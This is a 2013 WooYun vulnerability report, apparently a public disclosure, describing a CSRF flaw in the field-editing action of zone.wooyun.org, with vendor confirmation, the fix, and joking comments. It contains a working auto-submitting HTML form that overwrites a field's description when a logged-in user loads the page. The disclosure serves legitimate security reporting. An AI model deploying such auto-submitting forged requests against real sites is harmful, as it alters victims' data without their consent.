当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-032529

漏洞标题:我是如何修改某帅哥领域的介绍的

相关厂商:乌云官方

漏洞作者: ‫‌

提交时间:2013-07-30 19:00

修复时间:2013-09-13 19:00

公开时间:2013-09-13 19:00

漏洞类型:CSRF

危害等级:中

自评Rank:6

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-07-30: 细节已通知厂商并且等待厂商处理中
2013-07-30: 厂商已经确认,细节仅向厂商公开
2013-08-09: 细节向核心白帽子及相关领域专家公开
2013-08-19: 细节向普通白帽子公开
2013-08-29: 细节向实习白帽子公开
2013-09-13: 细节向公众公开

简要描述:

压力好大.

详细说明:

领域信息修改没有做token验证,导致CSRF...

<meta charset="utf-8">
<form action="http://zone.wooyun.org/index.php?do=action&act=editfield" method="post" enctype="multipart/form-data">
<input type="hidden" name="fieldId" value="30" />
<input name="fieldKey" type="hidden" value="protect" />
<input name="fieldName" type="hidden" value="如何保护自己" />
<input name="fieldImg" type="file" />
<input name="authType" type="hidden" value="0">
<input name="description" type="hidden" value="By 0x0F">
<input name="reading" type="hidden" value="">
</form>
<script>
document.forms[0].submit();
</script>

漏洞证明:

忽悠@safe121 点了我的页面。于是结果是这样的。

hehe


真不是故意的。

修复方案:

我好像暴露马甲了。

版权声明:转载请注明来源 ‫‌@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:1

确认时间:2013-07-30 19:14

厂商回复:

确认问题存在,并已修复。

最新状态:

暂无

漏洞评价:

评论

  1. 2013-07-30 19:12 | 0x2b ( 实习白帽子 | Rank:51 漏洞数:12 )

    前排出售瓜子汽水香烟板凳

  2. 2013-07-30 19:43 | 有妹子送上 ( 实习白帽子 | Rank:89 漏洞数:28 | 杭州最帅的男人)

    出售黄金广告位。10wb/月

  3. 2013-07-30 19:50 | lucky ( 普通白帽子 | Rank:409 漏洞数:84 | 三人行必有我师焉########################...)

    什么情况?

  4. 2013-07-30 20:06 | 猥琐 ( 路人 | Rank:6 漏洞数:2 | 学习什么的最重要!)

    圈不到的DZ

  5. 2013-07-31 00:58 | 橙夏 ( 实习白帽子 | Rank:35 漏洞数:4 | 喵呜喵呜喵呜呜呜 喵呜呜喵呜呜呜呜 喵呜呜...)

    什么情况

  6. 2013-07-31 08:45 | ‫‌ ( 实习白帽子 | Rank:76 漏洞数:14 )

    1rank..我怎么不拿来利用呢

  7. 2013-07-31 08:54 | VIP ( 普通白帽子 | Rank:759 漏洞数:100 )

    我猜是csrf,修改领域介绍没token

  8. 2013-07-31 20:27 | 0x0F ( 普通白帽子 | Rank:231 漏洞数:60 | 尖刀安全 (JDSec.Com).......................)

    @VIP 类型都写这CSRF了。。用得着你猜么。。。

  9. 2013-08-12 14:38 | VIP ( 普通白帽子 | Rank:759 漏洞数:100 )

    @0x0F 暴露马甲了

  10. 2013-08-12 23:42 | 0x0F ( 普通白帽子 | Rank:231 漏洞数:60 | 尖刀安全 (JDSec.Com).......................)

    @VIP 哈哈,是啊,要不你也做我的马甲吧

  11. 2013-08-13 07:36 | VIP ( 普通白帽子 | Rank:759 漏洞数:100 )

    @0x0F 然后你的wb归我?

  12. 2013-08-13 09:45 | 0x0F ( 普通白帽子 | Rank:231 漏洞数:60 | 尖刀安全 (JDSec.Com).......................)

    @VIP 对,这句话正是我想说的

  13. 2013-09-13 20:47 | Master ( 路人 | Rank:29 漏洞数:10 )

    @0x0F 中国最好的跨站师